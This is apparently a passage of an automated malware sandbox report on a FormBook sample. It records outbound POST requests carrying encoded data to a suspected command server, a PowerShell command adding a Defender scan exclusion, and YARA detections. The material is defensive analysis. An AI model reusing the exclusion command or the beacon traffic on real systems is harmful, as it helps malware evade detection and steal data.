                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              44  192.168.2.4  49786  84.32.84.37  80  5084  C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Sep 12, 2024 15:08:29.899676085 CEST  438  OUT  GET /2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KUTMu6S9hUr3H6R86Tmthm+6q52UOZ+nCsRLRXiC8/ThNXsRz23FX+gx8VT4y+4=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.healtheduction.site
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:08:30.548763037 CEST  1236  IN  HTTP/1.1 301 Moved Permanently
                                                              Server: hcdn
                                                              Date: Thu, 12 Sep 2024 13:08:30 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 795
                                                              Connection: close
                                                              location: https://www.healtheduction.site/2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KUTMu6S9hUr3H6R86Tmthm+6q52UOZ+nCsRLRXiC8/ThNXsRz23FX+gx8VT4y+4=&IhkTb=xPfHG0o8kZI8
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: f99ab451c1fed9ef1028618c9f492bd3-bos-edge3
                                                              x-hcdn-cache-status: MISS
                                                              x-hcdn-upstream-rt: 0.234
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 styl
                                                              Timestamp:Sep 12, 2024 15:08:30.548953056 CEST
                                                              Bytes transferred:137
                                                              Direction:IN
                                                              Data Ascii: e="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session ID:45
                                                              Source IP:192.168.2.4
                                                              Source Port:49787
                                                              Destination IP:3.33.130.190
                                                              Destination Port:80
                                                              PID:5084
                                                              Process:C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp:Sep 12, 2024 15:08:35.725043058 CEST
                                                              Bytes transferred:698
                                                              Direction:OUT
                                                              Data:
                                                              POST /tni7/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.globyglen.info
                                                              Origin: http://www.globyglen.info
                                                              Referer: http://www.globyglen.info/tni7/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=CgPVVrSo/dWdCqSq1yg9JEkJBF2oEgfSdpVWkhL8PnwtkCgRIRtHqnrP5W/0ie9GTjSzHd01fL4OOUV8yZa0F/GXRPVbPQPEo2yzM0WvSTlnItW+ovmDcj7qdlO8JhFA+06Gn8l1Pjq9BVMEzvEc5GhYh8O8TCWjD+/D+H30CDxyvqnqDGkaS5OSYk34v5FLTQ==


                                                              Session ID:46
                                                              Source IP:192.168.2.4
                                                              Source Port:49788
                                                              Destination IP:3.33.130.190
                                                              Destination Port:80
                                                              PID:5084
                                                              Process:C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp:Sep 12, 2024 15:08:38.280320883 CEST
                                                              Bytes transferred:718
                                                              Direction:OUT
                                                              Data:
                                                              POST /tni7/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.globyglen.info
                                                              Origin: http://www.globyglen.info
                                                              Referer: http://www.globyglen.info/tni7/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=CgPVVrSo/dWdBKCq3Tg9PkkWc12odQebdpRWkgPsMVUtlnMRG1xHpnrP22/9s+9zTjuBHcY1fLsOOR58yqi3fPHxF/VVRgPEo2yzM3qRST9nIdG+69eERD7pN1O8NhFb+064n49fPhS9BXkEz+EDwGhe/8PpSTr0FOO93GzwNzJBus2wS3FNA5qhFj+Mi64CIXanl3djbBZYmZHifKLLTqU=


                                                              Session ID:47
                                                              Source IP:192.168.2.4
                                                              Source Port:49789
                                                              Destination IP:3.33.130.190
                                                              Destination Port:80
                                                              PID:5084
                                                              Process:C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp:Sep 12, 2024 15:08:40.824382067 CEST
                                                              Bytes transferred:10800
                                                              Direction:OUT
                                                              Data:
                                                              POST /tni7/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.globyglen.info
                                                              Origin: http://www.globyglen.info
                                                              Referer: http://www.globyglen.info/tni7/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV= [TRUNCATED]


                                                              Session ID:48
                                                              Source IP:192.168.2.4
                                                              Source Port:49790
                                                              Destination IP:3.33.130.190
                                                              Destination Port:80
                                                              PID:5084
                                                              Process:C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp:Sep 12, 2024 15:08:43.369678020 CEST
                                                              Bytes transferred:433
                                                              Direction:OUT
                                                              Data:
                                                              GET /tni7/?IhkTb=xPfHG0o8kZI8&3tV=Pin1WdfA+NS6cNSxoiNhG1YTVXa1Eh3sPPVbkgnhBmMZ4UpRd1NHllH88EmBo/tJBgeDNt41XaNDTXpF9fqEP/qeQ/p/TwjIkU/ZAha4TiA1Pr+q7OP4Tjw= HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.globyglen.info
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko



                                                              Target ID:0
                                                              Start time:09:04:58
                                                              Start date:12/09/2024
                                                              Path:C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                                                              Imagebase:0xf00000
                                                              File size:730'112 bytes
                                                              MD5 hash:6E3E35E593690A43C0FABE9EC9367B67
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:09:05:00
                                                              Start date:12/09/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                                                              Imagebase:0xdf0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:09:05:00
                                                              Start date:12/09/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:09:05:00
                                                              Start date:12/09/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                              Imagebase:0x9e0000
                                                              File size:2'625'616 bytes
                                                              MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:09:05:08
                                                              Start date:12/09/2024
                                                              Path:C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe"
                                                              Imagebase:0xbd0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:6
                                                              Start time:09:05:10
                                                              Start date:12/09/2024
                                                              Path:C:\Windows\SysWOW64\control.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\control.exe"
                                                              Imagebase:0xdb0000
                                                              File size:149'504 bytes
                                                              MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:10
                                                              Start time:09:05:23
                                                              Start date:12/09/2024
                                                              Path:C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe"
                                                              Imagebase:0xbd0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:11
                                                              Start time:09:05:35
                                                              Start date:12/09/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff6bf500000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:9.1%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:10.3%
                                                                Total number of Nodes:174
                                                                Total number of Limit Nodes:8

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Pptq$$tq$$tq
                                                                • API String ID: 0-2504848753
                                                                • Opcode ID: 05e39b0b61ac5870b275928d1c6b9d802d91e5673b3460f29973c7827336432a
                                                                • Instruction ID: 283b0c2cf94a6fbb22ab4c29632bb24a7e0b34084dc7ade691588c3f0b7d8456
                                                                • Opcode Fuzzy Hash: 05e39b0b61ac5870b275928d1c6b9d802d91e5673b3460f29973c7827336432a
                                                                • Instruction Fuzzy Hash: 7D73E834A01A598FCB64DF68CC94AAAB7B2FF89301F1155E9D409AB351DB31AEC5CF40

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Pptq$$tq$$tq
                                                                • API String ID: 0-2504848753
                                                                • Opcode ID: 1b4ca379fba9f662541f92ece17ab35cfcc779102c9faca6643a57dc9b763593
                                                                • Instruction ID: 58aef7247e91d32aec72a71ba60b6289c4a0f6403db3f33dd91957fc99c556b9
                                                                • Opcode Fuzzy Hash: 1b4ca379fba9f662541f92ece17ab35cfcc779102c9faca6643a57dc9b763593
                                                                • Instruction Fuzzy Hash: 6163F934A01A598FCB64DF68CC94AAAB7B1FF99301F1145E9D409AB361DB30AEC5CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 68adc483de01f1173c8b70e8976041cb730789d861229fa1e2d2c05a48583423
                                                                • Instruction ID: 648e6d7fd81ca212508360709298b73469acc1d6d8d67ef6644fe9bb87e9e3a0
                                                                • Opcode Fuzzy Hash: 68adc483de01f1173c8b70e8976041cb730789d861229fa1e2d2c05a48583423
                                                                • Instruction Fuzzy Hash: F912A2F05017468AE771DF25E8DC1893BB2BB85318F984729D2612F2E9DBB8164BCF44
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 86543bbe8d21a01da538ca5779cfcdfedd6c68403038d6d8726477ad9bc366cb
                                                                • Instruction ID: 3fca9f2dcc495dcd3f499a5893a70079f32222ff7a063cb1eb207f75e5b8afc9
                                                                • Opcode Fuzzy Hash: 86543bbe8d21a01da538ca5779cfcdfedd6c68403038d6d8726477ad9bc366cb
                                                                • Instruction Fuzzy Hash: 8FC117B09007468BE771DF24E8D81897BB2FB85324F984729D1612F2E9DBB8164BCF44

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 0185DB16
                                                                • GetCurrentThread.KERNEL32 ref: 0185DB53
                                                                • GetCurrentProcess.KERNEL32 ref: 0185DB90
                                                                • GetCurrentThreadId.KERNEL32 ref: 0185DBE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: c0ee31e214f4a3cb4c40d56939f830a01016fb1028647d251d64591bee27883b
                                                                • Instruction ID: f1410e44037878cc7dff8e9ff1d516a117f9341b47ba9e4cdf7d0e280282b15a
                                                                • Opcode Fuzzy Hash: c0ee31e214f4a3cb4c40d56939f830a01016fb1028647d251d64591bee27883b
                                                                • Instruction Fuzzy Hash: 0D5163B0900249DFDB58CFAAD948BDEBBF1FF88314F208119E919A7260D7346944CB26

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B65E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 66421266b8de39987c53a0f7bfc59464afe3ee79ecb2ff319c50afc1205cd38d
                                                                • Instruction ID: 685339317886320cd96599439ef8cdb05bb4d8541ecb616ca02b6b07a7aa2489
                                                                • Opcode Fuzzy Hash: 66421266b8de39987c53a0f7bfc59464afe3ee79ecb2ff319c50afc1205cd38d
                                                                • Instruction Fuzzy Hash: 01815670A00B458FD765CF2AD48075ABBF2FF88314F008A2DD88ADBA51D774E945CB91

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01A72042
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: d97cbc415690343939f14424a42bc5f48c7cec518acae163359c6a4b2f84fa03
                                                                • Instruction ID: 709a58fd56cec71b80f9fa745134510c6ffe44fd20ffffe1c58794dcfdbde178
                                                                • Opcode Fuzzy Hash: d97cbc415690343939f14424a42bc5f48c7cec518acae163359c6a4b2f84fa03
                                                                • Instruction Fuzzy Hash: 3151C0B1D10349DFDB15CF99C884ADEBFB6BF48310F64812AE819AB210D7759946CF90

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01A72042
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: a50055da43e40f78f5db9f4d37a27f3082be741d2374afa8c46305551c57944f
                                                                • Instruction ID: 5e57dd05115a7bdb9003902b8492c2577fbd00108f2ba8df8c30316729dbb40c
                                                                • Opcode Fuzzy Hash: a50055da43e40f78f5db9f4d37a27f3082be741d2374afa8c46305551c57944f
                                                                • Instruction Fuzzy Hash: 0B41A0B1D10349DFDB15CF9AC884ADEBFB6BF48310F64812AE819AB210D7759945CF90

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 01855DC9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: e289f57fe11937b618f57bce11ceaadc5e5ae0dbabf5743fabc9d996023d0046
                                                                • Instruction ID: cdf81e48c93b8891ca19a80dfffa7225921a0efb353ddbbdda0d27be5419dc70
                                                                • Opcode Fuzzy Hash: e289f57fe11937b618f57bce11ceaadc5e5ae0dbabf5743fabc9d996023d0046
                                                                • Instruction Fuzzy Hash: 7041B0B1C00719CADB24DFAAC884B9DBBF5FF48304F20806AD908AB251DB756946CF90

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 01855DC9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 83631508362466c6d19981b3d633a9069acf4961b09b4f781c3f66aa339d1620
                                                                • Instruction ID: 83f1162fdd0acf396cc65069322922001d4e32b7b2e90447f77a3a88701bb9fc
                                                                • Opcode Fuzzy Hash: 83631508362466c6d19981b3d633a9069acf4961b09b4f781c3f66aa339d1620
                                                                • Instruction Fuzzy Hash: 3541BFB1C00759CADB24CFA9C885ADEBBB5FF49304F20816AD808AB251DB756A46CF50

                                                                Control-flow Graph

                                                                APIs
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 01A74751
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: CallProcWindow
                                                                • String ID:
                                                                • API String ID: 2714655100-0
                                                                • Opcode ID: e9295a4304a50b2c6116faabaf36cbc9122fd223ef4973bea89fb566ba5d11c5
                                                                • Instruction ID: 248dfe2799e120c68e97411d33c38f611dc4d3a71d3d61de4c306db3bc239d21
                                                                • Opcode Fuzzy Hash: e9295a4304a50b2c6116faabaf36cbc9122fd223ef4973bea89fb566ba5d11c5
                                                                • Instruction Fuzzy Hash: F64116B8900245DFDB14CF99C888AAAFBF5FF8D324F258459D519AB321D374A941CFA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1962 185dce0-185dd74 DuplicateHandle 1963 185dd76-185dd7c 1962->1963 1964 185dd7d-185dd9a 1962->1964 1963->1964
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185DD67
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 654876cf77754d91d8b88a1969ff7e10e8bdb01a4f2038d58c65d0ee332ded95
                                                                • Instruction ID: f9d3020dbe310cc854c631871998a0d6ab85de113ba8fcec8cae3f09e56bc5d3
                                                                • Opcode Fuzzy Hash: 654876cf77754d91d8b88a1969ff7e10e8bdb01a4f2038d58c65d0ee332ded95
                                                                • Instruction Fuzzy Hash: 9B21C4B5900248DFDB10CFAAD984ADEBFF8EB48320F14841AE914A7350D375A944CFA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1967 185b5f8-185b638 1968 185b640-185b66b GetModuleHandleW 1967->1968 1969 185b63a-185b63d 1967->1969 1970 185b674-185b688 1968->1970 1971 185b66d-185b673 1968->1971 1969->1968 1971->1970
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B65E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 1de96d871ddf0d323edcc55907faad8051f37f16898f00f0da5738e837b6e249
                                                                • Instruction ID: 99adcf388714c46b911ed86117470b846702f76cf1163a04457ad3d87b4bcb0d
                                                                • Opcode Fuzzy Hash: 1de96d871ddf0d323edcc55907faad8051f37f16898f00f0da5738e837b6e249
                                                                • Instruction Fuzzy Hash: B91110B5C00649CFDB20CF9AC844ADEFBF5EF88324F14852AD919A7610C379A645CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709947643.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_157d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
